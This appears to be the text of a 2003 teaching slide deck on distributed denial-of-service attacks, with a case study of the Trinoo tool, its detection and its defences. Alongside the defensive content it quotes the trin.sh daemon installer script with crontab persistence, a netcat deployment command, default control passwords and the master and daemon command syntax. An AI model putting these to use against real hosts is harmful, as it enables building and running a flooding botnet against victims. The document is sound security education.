An Introduction to DDoS And the “Trinoo” Attack Tool Prepared by Ray Lam, Ivan Wong July 10, 2003

Outline Background on DDoS  Attack mechanism  Ways to defend The attack tool – Trinoo  Introduction  Attack scenario  Symptoms and defense  Weaknesses and next evolution

Background on DDoS Attack mechanism

Denial-Of-Service Flooding-based Send packets to victims  Network resources  System resources Traditional DOS  One attacker Distributed DOS  Countless attackers

Attack Mechanism Direct Attack Reflector Attack R A V TCP SYN, ICMP, UDP With R’s Address as source IP address. TCP SYN-ACK, TCP RST, ICMP, UDP.. R V A TCP SYN, ICMP, UDP.. With V’s Address as source IP address.

Attack Architecture V A Masters (handlers) Agents (Daemons or Zombies) TCP SYN, ICMP, UDP.. (the source IP addresses are usually spoofed) Direct Attack A Masters (handlers) Agents (Daemons or Zombies) Reflectors V Reflector Attack TCP SYN, ICMP, UDP.. (with V’s address as the source IP addresses) TCP SYN-ACK, TCP RST, ICMP, UDP..

Attack Methods Attack packetsReply packets SmurfICMP echo queries to broadcast address ICMP echo replies SYN floodingTCP SYN packetsTCP SYN ACK packets RST floodingTCP packets to closed portsTCP RST packets ICMP flooding ICMP queries UDP packets to closed ports IP packets with low TTL ICMP replies Port unreachable Time exceeded DNS reply flooding DNS queries (recursive) to DNS servers DNS replies

BackScatter Analysis (Moore et al.) Measured DOS activity on the Internet. TCP (94+ %) UDP (2 %) ICMP (2 %) TCP attacks based mainly on SYN flooding

Background on DDoS Ways to defend

Strategy Three lines of defense:  Attack prevention - before the attack  Attack detection and filtering - during the attack  Attack source traceback - during and after the attack

Attack prevention Protect hosts from installation of masters and agents by attackers Scan hosts for symptoms of agents being installed Monitor network traffic for known message exchanges among attackers, masters, agents

Attack prevention Inadequate and hard to deploy Don’t-care users leave security holes ISP and enterprise networks do not have incentives

Attack source traceback Identify actual origin of packet Without relying on source IP of packet 2 approaches  Routers record info of packets  Routers send additional info of packets to destination

Attack source traceback Source traceback cannot stop ongoing DDoS attack  Cannot trace origins behind firewalls, NAT (network address translators)  More to do for reflector attack (attack packets from legitimate sources) Useful in post-attack law enforcement

Attack detection and filtering Detection  Identify DDoS attack and attack packets Filtering  Classify normal and attack packets  Drop attack packets

Attack detection and filtering Can be done in 4 places  Victim’s network  Victim’s ISP network  Further upstream ISP network  Attack source networks Dispersed agents send packets to single victim Like pouring packets from top of funnel

Attack detection and filtering Victim Attack source networks Further upstream ISP networks Victim’s ISP network Victim’s network Effectiveness of filtering increases Effectiveness of detection increases

Attack detection and filtering Detection  Easy at victim’s network – large amount of attack packets  Difficult at individual agent’s network – small amount of attack packets Filtering  Effective at agents’ networks – less likely to drop normal packets  Ineffective at victim’s network – more normal packets are dropped

D&F at agent’s network Usually cannot detect DDoS attack Can filter attack packets with address spoofed  Attack packets in direct attacks  Attack packets from agents to reflectors in reflector attacks Ensuring all ISPs to install ingress packet filtering is impossible

D&F at victim’s network Detect DDoS attack  Unusually high volume of incoming traffic of certain packet types  Degraded server and network performance Filtering is ineffective  Attack and normal packets have same destination – victim’s IP and port  Attack packets have source IP spoofed or come from many different IPs  Attack and normal packets indistinguishable

D&F at victim’s upstream ISP Often requested by victim to filter attack packets Alert protocol  Victim cannot receive ACK from ISP  Requires strong authentication and encryption Filtering ineffective ISP network may also be jammed

D&F at further upstream ISP Backpressure approach Victim detects DDoS attack Upstream ISPs filter attack packets

The attack tool – Trinoo Introduction

Discovered in August 1999 Daemons found on Solaris 2.x systems Attack a system in University of Minnesota Victim unusable for 2 days

Attack type UDP flooding Default size of UDP packet: 1000 bytes  malloc() buffer of this size and send uninitialized content Default period of attack: 120 seconds Destination port: randomly chosen from 0 – 65534

The attack tool – Trinoo Attack scenario

Installation 1. Hack an account  Acts as repository Scanning tools, attack tools, Trinoo daemons, Trinoo maters, etc.  Requirements High bandwidth connection Large number of users Little administrative oversight

Installation 2. Compromise systems  Look for vulnerable systems Unpatched Sun Solaris and Linux  Remote buffer overflow exploitation Set up root account Open TCP ports  Keep a `friend list`

Installation 3. Install daemons  Use “netcat” (“nc”) and “trin.sh”  netcat Network version of “cat”  trin.sh Shell script to set up daemons./trin.sh | nc 128.aaa &./trin.sh | nc 128.aaa &

Installation trin.sh echo "rcp :leaf /usr/sbin/rpc.listen" echo "echo rcp is done moving binary" echo "chmod +x /usr/sbin/rpc.listen" echo "echo launching trinoo" echo "/usr/sbin/rpc.listen" echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron" echo "crontab cron" echo "echo launched" echo "exit"

Architecture Victim Attacker Masters (handlers) Agents (Daemons or Zombies) Direct Attack

Communication ports Monitor specific ports to detect presence of master, agent AttackerMasterDaemon Port TCP UDP Port Port 31335

Password protection Password used to prevent administrators or other hackers to take control Encrypted password compiled into master and daemon using crypt() Clear-text password is sent over network – session is not encrypted Received password is encrypted and compared

Password protection Default passwords  “l44adsl” – trinoo daemon password  “gOrave” – trinoo master server startup  “betaalmostdone” – trinoo master remote interface password  “killme” – trinoo master password to control “mdie” command

Login to master Telnet to port of the host with master Enter password “betaalmostdone” Warn if others try to connect the master root]# telnet r Trying Connected to r1.router ( ). Escape character is '^]'. betaalmostdone trinoo v1.07d2+f3+c..[rpm8d/cb4Sx/] trinoo>

Master and daemon Communicate by UDP packets Command line format  arg1 password arg2 Default password is “l44adsl” When daemon starts, it sends “HELLO” to master Master maintains list of daemon

Master commands dos IP  DoS the IP address specified  “aaa l44adsl IP” sent to each daemon mdos  DoS the IPs simultaneously mtimer N  Set attack period to N seconds

Master commands bcast  List all daemons’ IP mdie password  Shutdown all daemons killdead  Invite all daemons to send “HELLO” to master  Delete all dead daemons from the list

Daemon commands Not directly used; only used by master to send commands to daemons Consist of 3 letters  Avoid exposing the commands by using Unix command “strings” on the binary

Daemon commands aaa password IP  DoS specified IP bbb password N  Set attack period to N seconds rsz password N  Set attack packet size to N bytes

The attack tool – Trinoo Symptoms and defense

Symptoms Masters  Crontab  Friend list … …-b * * * * * /usr/sbin/rpc.listen # ls -l b -rw root root 25 Sep 26 14: rw root root 50 Sep 26 14:30...-b

Symptoms Masters (Con’t)  Socket status # netstat -a --inet Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 *:27665 *:* LISTEN... udp 0 0 *:31335 *:*...

Symptoms Masters (Con’t)  File status # lsof | egrep ":31335|:27665" master 1292 root 3u inet 2460 UDP *:31335 master 1292 root 4u inet 2461 TCP *:27665 (LISTEN) # lsof -p 1292 COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME master 1292 root cwd DIR 3, /tmp/... master 1292 root rtd DIR 3, / master 1292 root txt REG 3, /tmp/.../master master 1292 root mem REG 3, /lib/ld so master 1292 root mem REG 3, /lib/libcrypt so

Symptoms Daemons  Socket status # netstat -a --inet Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State... udp 0 0 *:1024 *:* udp 0 0 *:27444 *:*...

Symptoms Daemons (Con’t)  File status # lsof | egrep ":27444" ns 1316 root 3u inet 2502 UDP *:27444 # lsof -p 1316 COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME ns 1316 root cwd DIR 3, /tmp/... ns 1316 root rtd DIR 3, / ns 1316 root txt REG 3, /tmp/.../ns ns 1316 root mem REG 3, /lib/ld so ns 1316 root mem REG 3, /lib/libcrypt so ns 1316 root mem REG 3, /lib/libc so

Defenses Prevent root level compromise  Patch systems  Set up firewalls  Monitor traffics Block abused ports  High numbered UDP ports  Trade off Also block normal programs using the same ports

The attack tool – Trinoo Weaknesses and next evolution

Weaknesses Single kind of attack  UDP flooding  Easily defended by single defense tools Use IP as destination address  “Moving target defense” – victim changes IP to avoid attack

Weaknesses Password, encrypted password, commands visible in binary images  Use Unix command “strings” to obtain - strings master - strings –n3 ns  Check if Trinoo found  Crack the encrypted passwords

Weaknesses Password travels in plain text in network  Daemon password frequently sent in master-to-daemon commands  Get password by “ngrep”, “tcpdump” which show UDP payload

Uproot a Trinoo network Locate a daemon Use “strings” to obtain IPs of masters Contact sites with master installed Those sites check list of daemons  By inspecting file “…” or get master login password and use “bcast” command  Get “mdie” password  Use “mdie” to shut down all daemons  “mdie” periodically as daemons restarted by crontab

Next evolution Combination of several attack types  SYN flood, UDP flood, ICMP flood…  Higher chance of successful attack Stronger encryption of embedded strings, passwords Use encrypted communication channel Communicate by protocol difficult to be detected or blocked, e.g. ICMP

References R. Chang, “Defending against Flooding- Based Distributed Denial-of-Service Attacks: A Tutorial,” Oct D. Dittrich, “The DoS Project’s ‘Trinoo’ Distributed Denial of Service Attack Tool,” o.analysis.txt, Oct o.analysis.txt

Open Discussion